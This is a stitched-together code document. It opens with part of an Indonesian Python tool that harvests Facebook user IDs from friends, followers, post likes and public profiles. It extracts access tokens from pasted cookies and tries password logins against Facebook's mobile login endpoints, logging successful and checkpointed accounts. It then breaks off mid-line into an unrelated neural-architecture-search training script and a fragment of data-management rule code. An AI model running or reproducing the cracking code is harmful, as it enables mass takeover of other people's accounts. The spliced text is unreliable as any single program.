print "\n *! Ketik *T* Jika Login Menggunakan Token"
print " *! Ketik *C* Jika Login Menggunakan Cookie"
lg = raw_input('\n *-> Input : ')
if lg == '':
os.sys.exit()
elif lg == 'T' or lg == 't':
toket = raw_input(" *-> Token : ") # Login Token
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
komen()
except KeyError:
print (" *! Token Salah")
time.sleep(1.7)
login()
except requests.exceptions.SSLError:
print (" *! Tidak Ada Koneksi")
exit()
elif lg == 'C' or lg == 'c':
try:
cookie = raw_input(" *-> Cookie : ")
data = {
'user-agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36', # don't change this user agent.
'referer' : 'https://m.facebook.com/',
'host' : 'm.facebook.com',
'origin' : 'https://m.facebook.com',
'upgrade-insecure-requests' : '1',
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cache-control' : 'max-age=0',
'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'content-type' : 'text/html; charset=utf-8',
'cookie' : cookie }
coki = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = data)
cari = re.search('(EAAA\w+)', coki.text)
hasil = cari.group(1)
pup = open('coki.log', 'w')
pup.write(cookie)
pup.close()
pip = open('login.txt', 'w')
pip.write(hasil)
pip.close()
komen()
except AttributeError:
print ' *! Cookie Salah'
time.sleep(3)
login()
except UnboundLocalError:
print ' *! Cookie Salah'
time.sleep(3)
login()
except requests.exceptions.SSLError:
print ' *! Tidak Ada Koneksi'
exit()
elif lg == '0' or lg == '00':
os.sys.exit()
else:
exit(' *! Isi Dengan Benar')
##### MENU #####
def menu():
try:
toket = open('login.txt','r').read()
otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
a = json.loads(otw.text)
nm = a['name']
id = a['id']
tl = a['birthday'].replace("/","-")
except Exception as e:
print (' *! Token Invalid')
time.sleep(1)
login()
except KeyError:
print (' *! Token Invalid')
time.sleep(1)
os.system('rm -rf login.txt')
login()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada koneksi')
os.sys.exit()
except Exception as e:
print (' *! Token Invalid')
time.sleep(1)
login()
os.system("clear")
print logo
print ('\n *•> Nama : '+nm)
print (' *•> Akun ID : '+id)
print (' *•> Tanggal Lahir : '+tl)
print ('\n *1 Crack ID Dari Teman')
print (' *2 Crack ID Dari Publik')
print (' *3 Crack ID Dari Followers')
print (' *4 Crack ID Dari Like')
print (' *5 Lihat Hasil Crack')
print (' *0 Keluar (Hapus Token/Cookies)\n')
mn=raw_input(" *-> Input : ")
if mn=="":
print (' *! Isi Dengan Benar')
menu()
elif mn=="1":
teman()
elif mn=="2":
publik()
elif mn=="3":
followers()
elif mn=="4":
like()
elif mn=="5":
print ('\n *1 Lihat Hasil Ok')
print (' *2 Lihat Hasil Cp')
print (' *0 Kembali\n')
hs = raw_input(' *-> Input : ')
if hs == '':
menu()
elif hs == '1' or hs == '01':
ok()
elif hs == '2' or hs == '02':
cp()
else:
exit(' *! Isi Dengan Benar')
elif mn=="0":
try:
os.remove("login.txt")
print (' *! Berhasil Menghapus Token/Cookies')
os.sys.exit()
except Exception as e:
print (' *! File Tidak Ada')
os.sys.exit()
else:
print (' *! Isi Dengan Benar')
menu()
def ok():
try:
ok=open('Ok.txt','r').read()
print ' '
print ok
except KeyError,IOError:
print (' *! Hasil Ok Tidak Ada')
os.sys.exit()
except Exception as e:
print (' *! Hasil Ok Tidak Ada')
os.sys.exit()
def cp():
try:
cp=open('Cp.txt','r').read()
print ' '
print cp
except KeyError,IOError:
print (' *! Hasil Cp Tidak Ada')
os.sys.exit()
except Exception as e:
print (' *! Hasil Cp Tidak Ada')
os.sys.exit()
##### CRACK TEMAN #####
def teman():
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
limit = '5000'
file = 'dump.txt'
try:
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket+"&limit="+limit)
except KeyError:
print (' *! Tidak Ada Teman')
raw_input(" *Kembali")
menu()
id = []
z=json.loads(r.text)
qq = ('teman.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpukan %s ID\r"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print " "
print("\r *-> Total ID : %s "%(len(id)))
metode()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada Koneksi')
os.sys.exit()
##### CRACK FOLLOWERS #####
def followers():
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
loginn()
try:
idt = raw_input("\n *-> Profil ID : ")
limit = '5000'
file = 'dump.txt'
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print(" *-> Nama : "+op["name"])
except KeyError:
print (' *! ID Tidak Ditemukan')
raw_input(" *Kembali")
menu()
r=requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+toket+"&limit="+limit)
id = []
z=json.loads(r.text)
qq = ('flw.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpukan %s ID\r"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print("\r *-> Total ID : %s "%(len(id)))
metode()
except KeyError:
print(' *! Tidak Ada Followers')
raw_input(' *Kembali')
menu()
except requests.exceptions.ConnectionError:
print(' *! Tidak Ada Koneksi')
os.sys.exit()
##### CRACK LIKE #####
def like():
try:
toket=open('login.txt','r').read()
except IOError:
print(' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
loginn()
try:
idt = raw_input("\n *-> Post ID : ")
limit = '5000'
file = 'dump.txt'
try:
r=requests.get("https://graph.facebook.com/"+idt+"/likes?limit="+limit+"&access_token="+toket)
except KeyError:
print (' *! Post ID Tidak Ada')
raw_input(" *Kembali")
menu()
id = []
z=json.loads(r.text)
qq = ('likess.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpulkan %s ID \r"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print("\r *-> Total ID : %s "%(len(id)))
metode()
except KeyError:
print (' *! Harus Berupa ID Postingan')
raw_input(' *Kembali')
menu()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada Koneksi')
os.sys.exit()
##### CRACK PUBLIK #####
def publik():
try:
toket=open('login.txt','r').read()
except IOError:
print (' *! Token Invalid')
os.system('rm -rf login.txt')
time.sleep(0.01)
loginn()
try:
idt = raw_input("\n *-> Profil ID : ")
limit = '5000'
file = 'dump.txt'
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print(" *-> Nama : "+op["name"])
except KeyError:
print(' *! Profil ID Tidak Ada')
raw_input(" *Kembali")
menu
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit("+limit+")&access_token="+toket)
id = []
z=json.loads(r.text)
qq = ('pblk.txt').replace(" ","_")
ys = open(qq , 'w')#.replace(" ","_")
for a in z['friends']['data']:
id.append(a['id']+"<=>"+a['name'])
ys.write(a['id']+"<=>"+a['name']+'\n')
print("\r *-> Mengumpulkan %s ID"%(str(len(id)))),;sys.stdout.flush();time.sleep(0.007)
ys.close()
os.rename(qq,file)
print("\r *-> Total ID : %s "%(len(id)))
metode()
except Exception as e:
print(' *! Tidak Ada Teman')
menu()
except requests.exceptions.ConnectionError:
print (' *! Tidak Ada Koneksi')
os.sys.exit()
def mbasic(em,pas,hosts):
global ua,mbasic_h
r=requests.Session()
r.headers.update(mbasic_h)
p=r.get("https://mbasic.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://mbasic.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in r.cookies.get_dict().keys():
return {"status":"success","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
elif "checkpoint" in r.cookies.get_dict().keys():
return {"status":"cp","email":em,"pass":pas,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}#crack mbasic
def mfb(em,pas,hosts):
global ua,mfb_h
r = requests.Session()
r.headers.update(mfb_h)
p = r.get('https://m.facebook.com/')
b = bs4.BeautifulSoup(p.text, 'html.parser')
dtg = ('').join(bs4.re.findall('dtsg":\\{"token":"(.*?)"', p.text))
data = {}
for i in b('input'):
if i.get('value') is None:
if i.get('name') == 'email':
data.update({'email': em})
elif i.get('name') == 'pass':
data.update({'pass': pas})
else:
data.update({i.get('name'): ''})
else:
data.update({i.get('name'): i.get('value')})
data.update({'fb_dtsg': dtg, 'm_sess': '', '__user': '0', '__req': 'd',
'__csr': '', '__a': '', '__dyn': '', 'encpass': ''})
r.headers.update({'referer': 'https://m.facebook.com/login/?next&ref=dbl&fl&refid=8'})
po = r.post('https://m.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100', data=data).text
if 'c_user' in r.cookies.get_dict().keys():
return {'status': 'success', 'email': em, 'pass': <PASSWORD>, 'cookies': r.cookies.get_dict()}
else:
if 'checkpoint' in r.cookies.get_dict().keys():
return {'status': 'cp', 'email': em, 'pass': pas, 'cookies': r.cookies.get_dict()}
else:
return {'status': 'error', 'email': em, 'pass': <PASSWORD>}
return
def free(em,pas,hosts):
global ua,free_h
r=requests.Session()
r.headers.update(free_h)
p=r.get("https://free.facebook.com/")
b=bs4.BeautifulSoup(p.text,"html.parser")
meta="".join(bs4.re.findall('dtsg":\{"token":"(.*?)"',p.text))
data={}
for i in b("input"):
if i.get("value") is None:
if i.get("name")=="email":
data.update({"email":em})
elif i.get("name")=="pass":
data.update({"pass":pas})
else:
data.update({i.get("name"):""})
else:
data.update({i.get("name"):i.get("value")})
data.update(
{"fb_dtsg":meta,"m_sess":"","__user":"0",
"__req":"d","__csr":"","__a":"","__dyn":"","encpass":""
}
)
r.headers.update({"referer":"https://free.facebook.com/login/?next&ref=dbl&fl&refid=8"})
po=r.post("https://free.facebook.com/login/device-based/login/async/?refsrc=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fref%3Ddbl&lwv=100",data=data).text
if "c_user" in list(r.cookies.get_dict().keys()):
return {"status":"success","email":em,"pass":<PASSWORD>,"cookies":r.cookies.get_dict()}
elif "checkpoint" in list(r.cookies.get_dict().keys()):
return {"status":"cp","email":em,"pass":<PASSWORD>,"cookies":r.cookies.get_dict()}
else:return {"status":"error","email":em,"pass":pas}
def metode():
print ('\n *1 Metode Login mbasic.facebook')
print (' *2 Metode Login m.facebook')
print (' *3 Metode | |
<reponame>dutxubo/nni<filename>examples/nas/legacy/textnas/retrain.py
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import sys
import os
import logging
import pickle
import shutil
import random
import math
import time
import datetime
import argparse
import distutils.util
import numpy as np
import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
import torch.nn.functional as Func
from model import Model
from nni.nas.pytorch.fixed import apply_fixed_architecture
from dataloader import read_data_sst
logger = logging.getLogger("nni.textnas")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--reset_output_dir",
type=distutils.util.strtobool,
default=True,
help="Whether to clean the output dir if existed. (default: %(default)s)")
parser.add_argument(
"--child_fixed_arc",
type=str,
required=True,
help="Architecture json file. (default: %(default)s)")
parser.add_argument(
"--data_path",
type=str,
default="data",
help="Directory containing the dataset and embedding file. (default: %(default)s)")
parser.add_argument(
"--output_dir",
type=str,
default="output",
help="The output directory. (default: %(default)s)")
parser.add_argument(
"--child_lr_decay_scheme",
type=str,
default="cosine",
help="Learning rate annealing strategy, only 'cosine' supported. (default: %(default)s)")
parser.add_argument(
"--batch_size",
type=int,
default=128,
help="Number of samples each batch for training. (default: %(default)s)")
parser.add_argument(
"--eval_batch_size",
type=int,
default=128,
help="Number of samples each batch for evaluation. (default: %(default)s)")
parser.add_argument(
"--class_num",
type=int,
default=5,
help="The number of categories. (default: %(default)s)")
parser.add_argument(
"--global_seed",
type=int,
default=1234,
help="Seed for reproduction. (default: %(default)s)")
parser.add_argument(
"--max_input_length",
type=int,
default=64,
help="The maximum length of the sentence. (default: %(default)s)")
parser.add_argument(
"--num_epochs",
type=int,
default=10,
help="The number of training epochs. (default: %(default)s)")
parser.add_argument(
"--child_num_layers",
type=int,
default=24,
help="The layer number of the architecture. (default: %(default)s)")
parser.add_argument(
"--child_out_filters",
type=int,
default=256,
help="The dimension of hidden states. (default: %(default)s)")
parser.add_argument(
"--child_out_filters_scale",
type=int,
default=1,
help="The scale of hidden state dimension. (default: %(default)s)")
parser.add_argument(
"--child_lr_T_0",
type=int,
default=10,
help="The length of one cycle. (default: %(default)s)")
parser.add_argument(
"--child_lr_T_mul",
type=int,
default=2,
help="The multiplication factor per cycle. (default: %(default)s)")
parser.add_argument(
"--min_count",
type=int,
default=1,
help="The threshold to cut off low frequent words. (default: %(default)s)")
parser.add_argument(
"--train_ratio",
type=float,
default=1.0,
help="The sample ratio for the training set. (default: %(default)s)")
parser.add_argument(
"--valid_ratio",
type=float,
default=1.0,
help="The sample ratio for the dev set. (default: %(default)s)")
parser.add_argument(
"--child_grad_bound",
type=float,
default=5.0,
help="The threshold for gradient clipping. (default: %(default)s)")
parser.add_argument(
"--child_lr",
type=float,
default=0.02,
help="The initial learning rate. (default: %(default)s)")
parser.add_argument(
"--cnn_keep_prob",
type=float,
default=0.8,
help="Keep prob for cnn layer. (default: %(default)s)")
parser.add_argument(
"--final_output_keep_prob",
type=float,
default=1.0,
help="Keep prob for the last output layer. (default: %(default)s)")
parser.add_argument(
"--lstm_out_keep_prob",
type=float,
default=0.8,
help="Keep prob for the RNN layer. (default: %(default)s)")
parser.add_argument(
"--embed_keep_prob",
type=float,
default=0.8,
help="Keep prob for the embedding layer. (default: %(default)s)")
parser.add_argument(
"--attention_keep_prob",
type=float,
default=0.8,
help="Keep prob for the self-attention layer. (default: %(default)s)")
parser.add_argument(
"--child_l2_reg",
type=float,
default=3e-6,
help="Weight decay factor. (default: %(default)s)")
parser.add_argument(
"--child_lr_max",
type=float,
default=0.002,
help="The max learning rate. (default: %(default)s)")
parser.add_argument(
"--child_lr_min",
type=float,
default=0.001,
help="The min learning rate. (default: %(default)s)")
parser.add_argument(
"--child_optim_algo",
type=str,
default="adam",
help="Optimization algorithm. (default: %(default)s)")
parser.add_argument(
"--checkpoint_dir",
type=str,
default="best_checkpoint",
help="Path for saved checkpoints. (default: %(default)s)")
parser.add_argument(
"--output_type",
type=str,
default="avg",
help="Opertor type for the time steps reduction. (default: %(default)s)")
parser.add_argument(
"--multi_path",
type=distutils.util.strtobool,
default=False,
help="Search for multiple path in the architecture. (default: %(default)s)")
parser.add_argument(
"--is_binary",
type=distutils.util.strtobool,
default=False,
help="Binary label for sst dataset. (default: %(default)s)")
parser.add_argument(
"--is_cuda",
type=distutils.util.strtobool,
default=True,
help="Specify the device type. (default: %(default)s)")
parser.add_argument(
"--is_mask",
type=distutils.util.strtobool,
default=True,
help="Apply mask. (default: %(default)s)")
parser.add_argument(
"--fixed_seed",
type=distutils.util.strtobool,
default=True,
help="Fix the seed. (default: %(default)s)")
parser.add_argument(
"--load_checkpoint",
type=distutils.util.strtobool,
default=False,
help="Wether to load checkpoint. (default: %(default)s)")
parser.add_argument(
"--log_every",
type=int,
default=50,
help="How many steps to log. (default: %(default)s)")
parser.add_argument(
"--eval_every_epochs",
type=int,
default=1,
help="How many epochs to eval. (default: %(default)s)")
global FLAGS
FLAGS = parser.parse_args()
def set_random_seed(seed):
logger.info("set random seed for data reading: {}".format(seed))
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
if FLAGS.is_cuda:
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
def get_model(embedding, num_layers):
logger.info("num layers: {0}".format(num_layers))
assert FLAGS.child_fixed_arc is not None, "Architecture should be provided."
child_model = Model(
embedding=embedding,
hidden_units=FLAGS.child_out_filters_scale * FLAGS.child_out_filters,
num_layers=num_layers,
num_classes=FLAGS.class_num,
choose_from_k=5 if FLAGS.multi_path else 1,
lstm_keep_prob=FLAGS.lstm_out_keep_prob,
cnn_keep_prob=FLAGS.cnn_keep_prob,
att_keep_prob=FLAGS.attention_keep_prob,
att_mask=FLAGS.is_mask,
embed_keep_prob=FLAGS.embed_keep_prob,
final_output_keep_prob=FLAGS.final_output_keep_prob,
global_pool=FLAGS.output_type)
apply_fixed_architecture(child_model, FLAGS.child_fixed_arc)
return child_model
def eval_once(child_model, device, eval_set, criterion, valid_dataloader=None, test_dataloader=None):
if eval_set == "test":
assert test_dataloader is not None
dataloader = test_dataloader
elif eval_set == "valid":
assert valid_dataloader is not None
dataloader = valid_dataloader
else:
raise NotImplementedError("Unknown eval_set '{}'".format(eval_set))
tot_acc = 0
tot = 0
losses = []
with torch.no_grad(): # save memory
for batch in dataloader:
(sent_ids, mask), labels = batch
sent_ids = sent_ids.to(device, non_blocking=True)
mask = mask.to(device, non_blocking=True)
labels = labels.to(device, non_blocking=True)
logits = child_model((sent_ids, mask)) # run
loss = criterion(logits, labels.long())
loss = loss.mean()
preds = logits.argmax(dim=1).long()
acc = torch.eq(preds, labels.long()).long().sum().item()
losses.append(loss)
tot_acc += acc
tot += len(labels)
losses = torch.tensor(losses)
loss = losses.mean()
if tot > 0:
final_acc = float(tot_acc) / tot
else:
final_acc = 0
logger.info("Error in calculating final_acc")
return final_acc, loss
def print_user_flags(FLAGS, line_limit=80):
log_strings = "\n" + "-" * line_limit + "\n"
for flag_name in sorted(vars(FLAGS)):
value = "{}".format(getattr(FLAGS, flag_name))
log_string = flag_name
log_string += "." * (line_limit - len(flag_name) - len(value))
log_string += value
log_strings = log_strings + log_string
log_strings = log_strings + "\n"
log_strings += "-" * line_limit
logger.info(log_strings)
def count_model_params(trainable_params):
num_vars = 0
for var in trainable_params:
num_vars += np.prod([dim for dim in var.size()])
return num_vars
def update_lr(
optimizer,
epoch,
l2_reg=1e-4,
lr_warmup_val=None,
lr_init=0.1,
lr_decay_scheme="cosine",
lr_max=0.002,
lr_min=0.000000001,
lr_T_0=4,
lr_T_mul=1,
sync_replicas=False,
num_aggregate=None,
num_replicas=None):
if lr_decay_scheme == "cosine":
assert lr_max is not None, "Need lr_max to use lr_cosine"
assert lr_min is not None, "Need lr_min to use lr_cosine"
assert lr_T_0 is not None, "Need lr_T_0 to use lr_cosine"
assert lr_T_mul is not None, "Need lr_T_mul to use lr_cosine"
T_i = lr_T_0
t_epoch = epoch
last_reset = 0
while True:
t_epoch -= T_i
if t_epoch < 0:
break
last_reset += T_i
T_i *= lr_T_mul
T_curr = epoch - last_reset
def _update():
rate = T_curr / T_i * 3.1415926
lr = lr_min + 0.5 * (lr_max - lr_min) * (1.0 + math.cos(rate))
return lr
learning_rate = _update()
else:
raise ValueError("Unknown learning rate decay scheme {}".format(lr_decay_scheme))
#update lr in optimizer
for params_group in optimizer.param_groups:
params_group['lr'] = learning_rate
return learning_rate
def train(device, data_path, output_dir, num_layers):
logger.info("Build dataloader")
train_dataset, valid_dataset, test_dataset, embedding = \
read_data_sst(data_path,
FLAGS.max_input_length,
FLAGS.min_count,
train_ratio=FLAGS.train_ratio,
valid_ratio=FLAGS.valid_ratio,
is_binary=FLAGS.is_binary)
train_dataloader = DataLoader(train_dataset, batch_size=FLAGS.batch_size, shuffle=True, pin_memory=True)
test_dataloader = DataLoader(test_dataset, batch_size=FLAGS.eval_batch_size, pin_memory=True)
valid_dataloader = DataLoader(valid_dataset, batch_size=FLAGS.eval_batch_size, pin_memory=True)
logger.info("Build model")
child_model = get_model(embedding, num_layers)
logger.info("Finish build model")
#for name, var in child_model.named_parameters():
# logger.info(name, var.size(), var.requires_grad) # output all params
num_vars = count_model_params(child_model.parameters())
logger.info("Model has {} params".format(num_vars))
for m in child_model.modules(): # initializer
if isinstance(m, (nn.Conv1d, nn.Linear)):
nn.init.xavier_uniform_(m.weight)
criterion = nn.CrossEntropyLoss()
# get optimizer
if FLAGS.child_optim_algo == "adam":
optimizer = optim.Adam(child_model.parameters(), eps=1e-3, weight_decay=FLAGS.child_l2_reg) # with L2
else:
raise ValueError("Unknown optim_algo {}".format(FLAGS.child_optim_algo))
child_model.to(device)
criterion.to(device)
logger.info("Start training")
start_time = time.time()
step = 0
# save path
model_save_path = os.path.join(FLAGS.output_dir, "model.pth")
best_model_save_path = os.path.join(FLAGS.output_dir, "best_model.pth")
best_acc = 0
start_epoch = 0
if FLAGS.load_checkpoint:
if os.path.isfile(model_save_path):
checkpoint = torch.load(model_save_path, map_location = torch.device('cpu'))
step = checkpoint['step']
start_epoch = checkpoint['epoch']
child_model.load_state_dict(checkpoint['child_model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
for epoch in range(start_epoch, FLAGS.num_epochs):
lr = update_lr(optimizer,
epoch,
l2_reg=FLAGS.child_l2_reg,
lr_warmup_val=None,
lr_init=FLAGS.child_lr,
lr_decay_scheme=FLAGS.child_lr_decay_scheme,
lr_max=FLAGS.child_lr_max,
lr_min=FLAGS.child_lr_min,
lr_T_0=FLAGS.child_lr_T_0,
lr_T_mul=FLAGS.child_lr_T_mul)
child_model.train()
for batch in train_dataloader:
(sent_ids, mask), labels = batch
sent_ids = sent_ids.to(device, non_blocking=True)
mask = mask.to(device, non_blocking=True)
labels = labels.to(device, non_blocking=True)
step += 1
logits = child_model((sent_ids, mask)) # run
loss = criterion(logits, labels.long())
loss = loss.mean()
preds = logits.argmax(dim=1).long()
acc = torch.eq(preds, labels.long()).long().sum().item()
optimizer.zero_grad()
loss.backward()
grad_norm = 0
trainable_params = child_model.parameters()
assert FLAGS.child_grad_bound is not None, "Need grad_bound to clip gradients."
# compute the gradient norm value
grad_norm = nn.utils.clip_grad_norm_(trainable_params, 99999999)
for param in trainable_params:
nn.utils.clip_grad_norm_(param, FLAGS.child_grad_bound) # clip grad
optimizer.step()
if step % FLAGS.log_every == 0:
curr_time = time.time()
log_string = ""
log_string += "epoch={:<6d}".format(epoch)
log_string += "ch_step={:<6d}".format(step)
log_string += " loss={:<8.6f}".format(loss)
log_string += " lr={:<8.4f}".format(lr)
log_string += " |g|={:<8.4f}".format(grad_norm)
log_string += " tr_acc={:<3d}/{:>3d}".format(acc, logits.size()[0])
log_string += " mins={:<10.2f}".format(float(curr_time - start_time) / 60)
logger.info(log_string)
epoch += 1
save_state = {
'step' : step,
'epoch' : epoch,
'child_model_state_dict' : child_model.state_dict(),
'optimizer_state_dict' : optimizer.state_dict()}
torch.save(save_state, model_save_path)
child_model.eval()
logger.info("Epoch {}: Eval".format(epoch))
eval_acc, eval_loss = eval_once(child_model, device, "test", criterion, test_dataloader=test_dataloader)
logger.info("ch_step={} {}_accuracy={:<6.4f} {}_loss={:<6.4f}".format(step, "test", eval_acc, "test", eval_loss))
if eval_acc > best_acc:
best_acc = eval_acc
logger.info("Save best model")
save_state = {
'step' : step,
'epoch' : epoch,
'child_model_state_dict' : child_model.state_dict(),
'optimizer_state_dict' : optimizer.state_dict()}
torch.save(save_state, best_model_save_path)
return eval_acc
def main():
parse_args()
if not os.path.isdir(FLAGS.output_dir):
logger.info("Path {} does not exist. Creating.".format(FLAGS.output_dir))
os.makedirs(FLAGS.output_dir)
elif FLAGS.reset_output_dir:
logger.info("Path {} exists. Remove and remake.".format(FLAGS.output_dir))
shutil.rmtree(FLAGS.output_dir, ignore_errors=True)
os.makedirs(FLAGS.output_dir)
print_user_flags(FLAGS)
if FLAGS.fixed_seed:
set_random_seed(FLAGS.global_seed)
device = torch.device("cuda" if FLAGS.is_cuda else "cpu")
train(device, FLAGS.data_path, | |
%s found' % (rule_id))
except StatementError:
raise RucioException('Badly formatted rule id (%s)' % (rule_id))
@transactional_session
def reduce_rule(rule_id, copies, exclude_expression=None, session=None):
"""
Reduce the number of copies for a rule by atomically replacing the rule.
:param rule_id: Rule to be reduced.
:param copies: Number of copies of the new rule.
:param exclude_expression: RSE Expression of RSEs to exclude.
:param session: The DB Session.
:raises: RuleReplaceFailed, RuleNotFound
"""
try:
rule = session.query(models.ReplicationRule).filter_by(id=rule_id).one()
if copies >= rule.copies:
raise RuleReplaceFailed('Copies of the new rule must be smaller than the old rule.')
if rule.state != RuleState.OK:
raise RuleReplaceFailed('The source rule must be in state OK.')
if exclude_expression:
rse_expression = '(' + rule.rse_expression + ')' + '\\' + '(' + exclude_expression + ')'
else:
rse_expression = rule.rse_expression
grouping = {RuleGrouping.ALL: 'ALL', RuleGrouping.NONE: 'NONE'}.get(rule.grouping, 'DATASET')
if rule.expires_at:
lifetime = (rule.expires_at - datetime.utcnow()).days * 24 * 3600 + (rule.expires_at - datetime.utcnow()).seconds
else:
lifetime = None
notify = {RuleNotification.YES: 'Y', RuleNotification.CLOSE: 'C', RuleNotification.PROGRESS: 'P'}.get(rule.notification, 'N')
new_rule_id = add_rule(dids=[{'scope': rule.scope, 'name': rule.name}],
account=rule.account,
copies=copies,
rse_expression=rse_expression,
grouping=grouping,
weight=rule.weight,
lifetime=lifetime,
locked=rule.locked,
subscription_id=rule.subscription_id,
source_replica_expression=rule.source_replica_expression,
activity=rule.activity,
notify=notify,
purge_replicas=rule.purge_replicas,
ignore_availability=rule.ignore_availability,
session=session)
session.flush()
new_rule = session.query(models.ReplicationRule).filter_by(id=new_rule_id[0]).one()
if new_rule.state != RuleState.OK:
raise RuleReplaceFailed('The replacement of the rule failed.')
delete_rule(rule_id=rule_id,
session=session)
return new_rule_id[0]
except NoResultFound:
raise RuleNotFound('No rule with the id %s found' % (rule_id))
@transactional_session
def move_rule(rule_id: str, rse_expression: str, override: Optional[Dict[str, Any]] = None, session=None):
"""
Move a replication rule to another RSE and, once done, delete the original one.
:param rule_id: Rule to be moved.
:param rse_expression: RSE expression of the new rule.
:param override: Configurations to update for the new rule.
:param session: The DB Session.
:raises: RuleNotFound, RuleReplaceFailed, InvalidRSEExpression
"""
override = override or {}
try:
rule = session.query(models.ReplicationRule).filter_by(id=rule_id).one()
if rule.child_rule_id:
raise RuleReplaceFailed('The rule must not have a child rule.')
grouping = {RuleGrouping.ALL: 'ALL', RuleGrouping.NONE: 'NONE'}.get(rule.grouping, 'DATASET')
if rule.expires_at:
lifetime = (rule.expires_at - datetime.utcnow()).days * 24 * 3600 + (rule.expires_at - datetime.utcnow()).seconds
else:
lifetime = None
notify = {RuleNotification.YES: 'Y', RuleNotification.CLOSE: 'C', RuleNotification.PROGRESS: 'P'}.get(rule.notification, 'N')
options = {
'dids': [{'scope': rule.scope, 'name': rule.name}],
'account': rule.account,
'copies': rule.copies,
'rse_expression': rse_expression,
'grouping': grouping,
'weight': rule.weight,
'lifetime': lifetime,
'locked': rule.locked,
'subscription_id': rule.subscription_id,
'source_replica_expression': rule.source_replica_expression,
'activity': rule.activity,
'notify': notify,
'purge_replicas': rule.purge_replicas,
'ignore_availability': rule.ignore_availability,
'comment': rule.comments,
'session': session,
}
for key in override:
if key in ['dids', 'session']:
raise UnsupportedOperation('Not allowed to override option %s' % key)
elif key not in options:
raise UnsupportedOperation('Non-valid override option %s' % key)
else:
options[key] = override[key]
new_rule_id = add_rule(**options)
session.flush()
update_rule(rule_id=rule_id, options={'child_rule_id': new_rule_id[0], 'lifetime': 0}, session=session)
return new_rule_id[0]
except NoResultFound:
raise RuleNotFound('No rule with the id %s found' % (rule_id))
@transactional_session
def re_evaluate_did(scope, name, rule_evaluation_action, session=None):
"""
Re-Evaluates a did.
:param scope: The scope of the did to be re-evaluated.
:param name: The name of the did to be re-evaluated.
:param rule_evaluation_action: The Rule evaluation action.
:param session: The database session in use.
:raises: DataIdentifierNotFound
"""
try:
did = session.query(models.DataIdentifier).filter(models.DataIdentifier.scope == scope,
models.DataIdentifier.name == name).one()
except NoResultFound:
raise DataIdentifierNotFound()
if rule_evaluation_action == DIDReEvaluation.ATTACH:
__evaluate_did_attach(did, session=session)
else:
__evaluate_did_detach(did, session=session)
# Update size and length of did
if session.bind.dialect.name == 'oracle':
stmt = session.query(func.sum(models.DataIdentifierAssociation.bytes),
func.count(1)).\
with_hint(models.DataIdentifierAssociation,
"index(CONTENTS CONTENTS_PK)", 'oracle').\
filter(models.DataIdentifierAssociation.scope == scope,
models.DataIdentifierAssociation.name == name)
for bytes_, length in stmt:
did.bytes = bytes_
did.length = length
